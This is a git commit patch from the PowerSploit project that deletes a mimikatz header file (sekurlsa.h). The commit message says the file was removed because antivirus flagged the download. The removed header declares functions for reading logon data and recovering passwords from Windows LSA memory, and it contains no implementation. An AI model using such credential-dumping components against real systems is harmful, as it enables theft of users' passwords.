From c5168cdba6a3b2d7dd8d79c8ac9583d3ace6a504 Mon Sep 17 00:00:00 2001 From: mattifestation Date: Mon, 3 Feb 2014 17:13:35 -0500 Subject: Removed mimikatz. This doesn't need to reside in PowerSploit. Those that are truly paranoid should validate that the embedded executable in Invoke-Mimikatz.ps1 is indeed mimikatz. This was causing AV to flag upon downloading PowerSploit. --- .../mimikatz-1.0/librairies/sekurlsa/sekurlsa.h | 23 ---------------------- 1 file changed, 23 deletions(-) delete mode 100644 Exfiltration/mimikatz-1.0/librairies/sekurlsa/sekurlsa.h (limited to 'Exfiltration/mimikatz-1.0/librairies/sekurlsa/sekurlsa.h') diff --git a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/sekurlsa.h b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/sekurlsa.h deleted file mode 100644 index c36e173..0000000 --- a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/sekurlsa.h +++ /dev/null @@ -1,23 +0,0 @@ -/* Benjamin DELPY `gentilkiwi` - http://blog.gentilkiwi.com - benjamin@gentilkiwi.com - Licence : http://creativecommons.org/licenses/by/3.0/fr/ - Ce fichier : http://creativecommons.org/licenses/by/3.0/fr/ -*/ -#pragma once -#include "kmodel.h" -#include "secpkg.h" -#include "mod_memory.h" -#include "mod_system.h" -#include "mod_text.h" -#include "mod_process.h" - -extern PLSA_SECPKG_FUNCTION_TABLE SeckPkgFunctionTable; - -bool searchLSAFuncs(); -__kextdll bool __cdecl getDescription(wstring * maDescription); - -typedef bool (WINAPI * PFN_ENUM_BY_LUID) (__in PLUID logId, __in mod_pipe * monPipe, __in bool justSecurity); -bool getLogonData(mod_pipe * monPipe, vector * mesArguments, vector> * mesProviders); - -wstring getPasswordFromProtectedUnicodeString(LSA_UNICODE_STRING * ptrPass); -- cgit v1.2.3